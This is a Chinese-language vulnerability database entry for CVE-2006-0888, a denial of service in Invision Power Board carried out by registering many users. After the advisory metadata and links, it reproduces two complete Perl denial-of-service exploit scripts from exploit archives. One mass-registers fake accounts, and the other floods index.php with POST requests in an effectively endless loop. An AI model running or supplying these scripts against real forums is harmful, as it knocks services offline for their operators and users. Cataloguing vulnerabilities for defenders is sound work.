CVE-2006-0888
CVSS2.6
发布时间 :2006-02-25 06:02:00
修订时间 :2008-09-10 16:03:26
NMCOE    

[原文]index.php in Invision Power Board (IPB) 2.0.1, with Code Confirmation disabled, allows remote attackers to cause an unspecified denial of service by registering a large number of users.


[CNNVD]Invision Power Board用户注册拒绝服务漏洞(CNNVD-200602-399)

        Invision Power Board (IPB) 2.0.1中的index.php在禁用代码确认的情况下,可使远程攻击者通过注册大量用户造成未明拒绝服务。

- CVSS (基础分值)

CVSS分值: 2.6 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0888
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0888
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200602-399
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/16616
(UNKNOWN)  BID  16616
http://milw0rm.com/exploits/1489
(UNKNOWN)  MILW0RM  1489

- 漏洞信息

Invision Power Board用户注册拒绝服务漏洞
低危 其他
2006-02-25 00:00:00 2006-02-27 00:00:00
远程  
        Invision Power Board (IPB) 2.0.1中的index.php在禁用代码确认的情况下,可使远程攻击者通过注册大量用户造成未明拒绝服务。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本。

- 漏洞信息 (1489)

Invision Power Board <= 2.1.4 (Register Users) Denial of Service Exploit (EDBID:1489)
multiple dos
2006-02-10 Verified
0 SkOd
N/A [点击下载]
#!/usr/bin/perl
use IO::Socket;
##########################################################
##		 _______ _______ ______ 		 #
##		 |______ |______ |     \		 #
##		 ______| |______ |_____/		 #
##		                        		 #
##IPB Register Multiple Users Denial of Service	   	 #
##Doesn't Work on forums using "Code Confirmation"	 #
##Created By SkOd                                        #
##SED security Team                                      #
##http://www.sed-team.be                                 #
##skod.uk@gmail.com                                      #
##ISRAEL                                                 #
##########################################################

print q{
############################################################
#        Invision Power Board Multiple Users DOS	   #
#		Tested on IPB 2.0.1			   #
#	    created By SkOd. SED Security Team             #
############################################################
};
$rand=rand(10);
print "Forum Host: ";
$serv = <stdin>;
chop ($serv);
print "Forum Path: ";
$path = <stdin>;
chop ($path);
for ($i=0; $i<9999; $i++)
{
$name="sedXPL_".$rand.$i;
$data = "act=Reg&CODE=02&coppa_user=0&UserName=".$name."&PassWord=sedbotbeta&PassWord_Check=sedbotbeta&EmailAddress=".$name."\@host.com&EmailAddress_two=".$name."\@host.com&allow_admin_mail=1&allow_member_mail=1&day=11&month=11&year=1985&agree=1";
$len = length $data;
$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "Cennot Connect Host, it's can be beacuse the host dosed";
print $get1 "POST ".$path."index.php HTTP/1.0\n";
print $get1 "Host: ".$serv."\n";
print $get1 "Content-Type: application/x-www-form-urlencoded\n";
print $get1 "Content-Length: ".$len."\n\n";
print $get1 $data;
syswrite STDOUT, "+";
}
print "Forum shuld be Dosed. Check it out...\n";

# milw0rm.com [2006-02-10]
		

- 漏洞信息 (12382)

Invision Power Board 0-day Denial of Service (EDBID:12382)
multiple dos
2010-04-25 Not Verified
0 SeeMe
N/A [点击下载]
==============================================
Invision power board 0-day denial of service 2 
==============================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 #################################### 1
0 I'm SeeMe member from Inj3ct0r Team 1
1 #################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


# Invision power board 0-day denial of service 2 100% works..
#
# It works on all versions! can DOS the whole server!
#
# Greetz to Inj3ct0r Crew
#
#Perl Script
use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<10; $i--)
{
$user="seeme".$rand.$i;
$data = "adsess=&"
;
$len = length $data;
$foo = "POST ".$dir."index.php HTTP/1.1\r\n".
"Accept: * /*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+" ;
}
print "\n\n";
system('ping $host');
sub usage {
print "\tusage: \n";
print "\t$0 <host> </dir/>\n";
print "\tex: $0 127.0.0.1 /forum/\n";
print "\tex2: $0 127.0.0.1 /\n\n";
exit();
};
################################################## ##############
# Greetz to Inj3ct0r Crew		

- 漏洞信息

28142
Invision Power Board index.php User Registration Saturation DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

- 时间线

2006-02-10 Unknow
2006-02-10 Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站